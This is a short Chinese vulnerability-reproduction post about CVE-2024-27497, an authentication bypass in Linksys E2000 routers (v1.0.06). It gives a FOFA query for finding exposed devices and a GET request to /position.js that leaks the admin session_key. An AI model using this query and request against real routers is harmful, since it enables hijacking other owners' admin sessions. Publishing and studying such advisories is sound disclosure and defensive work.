【漏洞复现】Linksys E2000 position.js 身份验证绕过漏洞(CVE-2024-27497)

0x01 产品简介

Linksys E2000是一款由思科(Cisco)品牌推出的无线路由器,它是一款支持2.4GHz和5GHz双频段的无线路由器,用户可以避开拥挤的2.4GHz频段,独自享受5GHz频段的高速无线生活。

0x02 漏洞概述

Linksys E2000 v1.0.06 存在身份验证绕过漏洞,未授权的攻击者可以通过该漏洞获取管理员的当前会话,从而绕过身份验证。

0x03 测绘语句

FOFA:app="LINKSYS-E2000"

0x04 漏洞复现

GET /position.js HTTP/1.1
如访问 /position.js路由存在 session_key和close_session字段,则证明存在此漏洞。

0x05 影响范围

Linksys E2000 v1.0.06

0x06 免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。

请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。

作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。
相关推荐
Mogu_cloud2 分钟前
pcdn盒子连接方式
网络·智能路由器
Hqst_Kevin4 分钟前
Hqst 品牌 H81801D 千兆 DIP 网络变压器在光猫收发器机顶盒中的应用
运维·服务器·网络·5g·网络安全·信息与通信·信号处理
Hqst 网络变压器 Andy4 分钟前
交换机最常用的网络变压器分为DIP和SM
网络·依赖倒置原则
网安康sir21 分钟前
2024年三个月自学手册 网络安全(黑客技术)
网络·安全·web安全
Nigoridl29 分钟前
MSF的使用学习
网络·web安全
iSee8571 小时前
imo云办公室 Imo_DownLoadUI.php 任意文件下载漏洞复现
安全
不会代码的小徐1 小时前
Django SQL注入-漏洞分析
安全·网络安全
专家大圣2 小时前
云原生信息安全:筑牢数字化时代的安全防线
安全·云原生
pemper_2 小时前
怎么操作使http变成https访问?
网络·网络协议·http·https·ssl